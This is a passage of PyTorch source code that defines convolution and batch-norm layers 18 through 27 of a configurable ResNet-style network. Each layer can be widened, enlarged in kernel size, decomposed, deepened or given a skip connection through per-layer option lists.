                self.conv18_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[18] == 4:
                self.conv18_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv18_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv18_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv18_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv18 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv18 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[18] == 1:
                self.conv18_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[18] == 1:
                self.conv18_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn18 = torch.nn.BatchNorm2d(params[1])
        # conv19 block: 3x3 conv, 32 -> 32 channels, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[18] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[18] / 4) * 4)
            if self.widen_list[19] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[19] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[19] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[19])
                params[3] = params[3] + 2 * int(self.kerneladd_list[19])
                params[6] = params[6] + int(self.kerneladd_list[19])
                params[7] = params[7] + int(self.kerneladd_list[19])
        if self.decompo_list is not None:
            if self.decompo_list[19] == 1:
                self.conv19_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[19] == 2:
                self.conv19_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[19] == 3:
                self.conv19_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[19] == 4:
                self.conv19_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv19_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv19 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv19 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[19] == 1:
                self.conv19_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[19] == 1:
                self.conv19_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn19 = torch.nn.BatchNorm2d(params[1])
        # conv20 block: 3x3 conv, 32 -> 32 channels, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[19] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[19] / 4) * 4)
            if self.widen_list[20] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[20] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[20] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[20])
                params[3] = params[3] + 2 * int(self.kerneladd_list[20])
                params[6] = params[6] + int(self.kerneladd_list[20])
                params[7] = params[7] + int(self.kerneladd_list[20])
        if self.decompo_list is not None:
            if self.decompo_list[20] == 1:
                self.conv20_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[20] == 2:
                self.conv20_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[20] == 3:
                self.conv20_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[20] == 4:
                self.conv20_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv20_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv20 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv20 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[20] == 1:
                self.conv20_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[20] == 1:
                self.conv20_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn20 = torch.nn.BatchNorm2d(params[1])
        # conv21 block: 3x3 conv, 32 -> 32 channels, stride 1
        params = [32, 32, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[20] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[20] / 4) * 4)
            if self.widen_list[21] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[21] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[21] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[21])
                params[3] = params[3] + 2 * int(self.kerneladd_list[21])
                params[6] = params[6] + int(self.kerneladd_list[21])
                params[7] = params[7] + int(self.kerneladd_list[21])
        if self.decompo_list is not None:
            if self.decompo_list[21] == 1:
                self.conv21_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[21] == 2:
                self.conv21_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[21] == 3:
                self.conv21_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[21] == 4:
                self.conv21_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv21_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv21 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv21 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[21] == 1:
                self.conv21_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[21] == 1:
                self.conv21_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn21 = torch.nn.BatchNorm2d(params[1])
        # conv22 block: 3x3 conv, 32 -> 64 channels, stride 2 (downsampling)
        params = [32, 64, 3, 3, 2, 2, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[21] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[21] / 4) * 4)
            if self.widen_list[22] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[22] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[22] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[22])
                params[3] = params[3] + 2 * int(self.kerneladd_list[22])
                params[6] = params[6] + int(self.kerneladd_list[22])
                params[7] = params[7] + int(self.kerneladd_list[22])
        if self.decompo_list is not None:
            if self.decompo_list[22] == 1:
                self.conv22_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[22] == 2:
                self.conv22_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[22] == 3:
                self.conv22_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[22] == 4:
                self.conv22_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv22_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv22 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv22 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[22] == 1:
                self.conv22_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[22] == 1:
                self.conv22_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn22 = torch.nn.BatchNorm2d(params[1])
        # conv23 block: 3x3 conv, 64 -> 64 channels, stride 1
        params = [64, 64, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[22] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[22] / 4) * 4)
            if self.widen_list[23] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[23] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[23] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[23])
                params[3] = params[3] + 2 * int(self.kerneladd_list[23])
                params[6] = params[6] + int(self.kerneladd_list[23])
                params[7] = params[7] + int(self.kerneladd_list[23])
        if self.decompo_list is not None:
            if self.decompo_list[23] == 1:
                self.conv23_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[23] == 2:
                self.conv23_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[23] == 3:
                self.conv23_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[23] == 4:
                self.conv23_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv23_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv23 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv23 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[23] == 1:
                self.conv23_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[23] == 1:
                self.conv23_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn23 = torch.nn.BatchNorm2d(params[1])
        # conv24 block: 1x1 conv, 32 -> 64 channels, stride 2
        params = [32, 64, 1, 1, 2, 2, 0, 0]
        if self.widen_list is not None:
            if self.widen_list[23] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[23] / 4) * 4)
            if self.widen_list[24] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[24] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[24] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[24])
                params[3] = params[3] + 2 * int(self.kerneladd_list[24])
                params[6] = params[6] + int(self.kerneladd_list[24])
                params[7] = params[7] + int(self.kerneladd_list[24])
        if self.decompo_list is not None:
            if self.decompo_list[24] == 1:
                self.conv24_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[24] == 2:
                self.conv24_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[24] == 3:
                self.conv24_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[24] == 4:
                self.conv24_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv24_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv24 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv24 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[24] == 1:
                self.conv24_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[24] == 1:
                self.conv24_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn24 = torch.nn.BatchNorm2d(params[1])
        # conv25 block: 3x3 conv, 64 -> 64 channels, stride 1
        params = [64, 64, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[24] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[24] / 4) * 4)
            if self.widen_list[25] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[25] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[25] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[25])
                params[3] = params[3] + 2 * int(self.kerneladd_list[25])
                params[6] = params[6] + int(self.kerneladd_list[25])
                params[7] = params[7] + int(self.kerneladd_list[25])
        if self.decompo_list is not None:
            if self.decompo_list[25] == 1:
                self.conv25_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[25] == 2:
                self.conv25_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[25] == 3:
                self.conv25_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[25] == 4:
                self.conv25_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv25_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv25 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv25 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[25] == 1:
                self.conv25_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[25] == 1:
                self.conv25_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn25 = torch.nn.BatchNorm2d(params[1])
        # conv26 block: 3x3 conv, 64 -> 64 channels, stride 1
        params = [64, 64, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[25] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[25] / 4) * 4)
            if self.widen_list[26] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[26] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[26] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[26])
                params[3] = params[3] + 2 * int(self.kerneladd_list[26])
                params[6] = params[6] + int(self.kerneladd_list[26])
                params[7] = params[7] + int(self.kerneladd_list[26])
        if self.decompo_list is not None:
            if self.decompo_list[26] == 1:
                self.conv26_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[26] == 2:
                self.conv26_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[26] == 3:
                self.conv26_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[26] == 4:
                self.conv26_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv26_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv26 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv26 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[26] == 1:
                self.conv26_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[26] == 1:
                self.conv26_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
        self.conv_bn26 = torch.nn.BatchNorm2d(params[1])
        # conv27 block: 3x3 conv, 64 -> 64 channels, stride 1
        params = [64, 64, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
            if self.widen_list[26] > 1.0:
                params[0] = int(np.floor(params[0] * self.widen_list[26] / 4) * 4)
            if self.widen_list[27] > 1.0:
                params[1] = int(np.floor(params[1] * self.widen_list[27] / 4) * 4)
        if self.kerneladd_list is not None:
            if self.kerneladd_list[27] > 0:
                params[2] = params[2] + 2 * int(self.kerneladd_list[27])
                params[3] = params[3] + 2 * int(self.kerneladd_list[27])
                params[6] = params[6] + int(self.kerneladd_list[27])
                params[7] = params[7] + int(self.kerneladd_list[27])
        if self.decompo_list is not None:
            if self.decompo_list[27] == 1:
                self.conv27_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv27_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[27] == 2:
                self.conv27_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv27_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv27_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv27_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[27] == 3:
                self.conv27_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv27_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            elif self.decompo_list[27] == 4:
                self.conv27_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
